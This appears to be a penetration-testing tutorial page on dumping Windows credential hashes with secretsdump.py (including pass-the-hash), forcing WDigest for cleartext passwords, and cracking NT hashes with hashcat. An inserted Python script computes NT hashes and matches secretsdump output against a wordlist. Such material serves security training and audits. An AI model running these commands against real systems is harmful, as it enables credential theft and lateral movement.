Dump and Crack Hashes

Definition

Once we have credentials and know on which machines we can use them, we can start exploiting those machines to find more credentials. That’s the dump part.

We mostly dig out hashes, and a major part of the game is then to crack them so that we can actually use most of them.

Proof of Concept

Secrets dumping

Once again, we can dump secrets with either a password or a hash, this time with the secretsdump.py tool.

secretsdump.py ORB/lkisaka:'Password1'@10.0.0.132
secretsdump.py administrator:@10.0.0.131 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

<aside> 💡 Note: With older protocols like WDigest, we can find passwords in clear text. A technique (a little harsh) consists of forcing its activation and waiting for an Administrator to log on.

</aside>

Cracking with Hashcat

Find a little more about Hashcat password cracking here: Password Cracking with Hashcat

This time we’re trying to crack the NTLM hashes that we just dumped above. To crack them, we only need the last part of each hash (the NT part, after the colon).

echo '7facdc498ed1680c4fd1448319a8c04f' > localadmin.hash
hashcat localadmin.hash -m 1000 /usr/share/wordlists/rockyou.txt
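As an added example (not part of this page, nor code from the impacket or hashcat projects), the script below reproduces both steps in pure Python: it pulls the NT part out of secretsdump-style SAM lines and checks those NT hashes against a small wordlist the way hashcat -m 1000 does (an NT hash is MD4 over the UTF-16LE password), which is also how a defender audits a dump for weak or empty passwords. The dump lines, hashes and wordlist are constructed, not taken from the page.

```python
import struct
M32 = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); an NT hash is MD4 over the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (  # (step function, round constant, message-word order, per-step shifts)
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [int(f"{i:04b}"[::-1], 2) for i in range(16)], (3, 9, 11, 15)),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, k, order, shifts in rounds:
            for i in range(16):
                t = (a + f(b, c, d) + X[order[i]] + k) & M32
                a, b, c, d = d, ((t << shifts[i % 4]) | (t >> (32 - shifts[i % 4]))) & M32, b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    """The NT part of a secretsdump line, i.e. what hashcat -m 1000 cracks."""
    return md4(password.encode("utf-16-le")).hex()

def parse_secretsdump(text: str) -> list:
    """Extract (user, NT hash) from 'user:rid:lmhash:nthash:::' lines; other output is skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and parts[1].isdigit() and len(parts[3]) == 32:
            entries.append((parts[0], parts[3].lower()))
    return entries

def audit(dump_text: str, wordlist: list) -> dict:
    """Map each dumped user to the wordlist password matching its NT hash, or None."""
    lookup = {nt_hash(w): w for w in wordlist}
    return {user: lookup.get(nt) for user, nt in parse_secretsdump(dump_text)}

# Constructed sample in secretsdump's SAM output format (these hashes are not from the page).
SAMPLE_DUMP = """[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::"""
WORDLIST = ["", "123456", "password", "letmein"]  # "" catches the empty-password NT hash
```

Calling `audit(SAMPLE_DUMP, WORDLIST)` reports Administrator as "password", Guest as the empty password, and svc_backup as not in the wordlist; the 32-hex NT values from `parse_secretsdump` are exactly the lines to write into the .hash file for hashcat.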

<aside> 💡 Note: Cracking a password may take a while. We should ensure that the password can be cracked and is worth the shot.

</aside>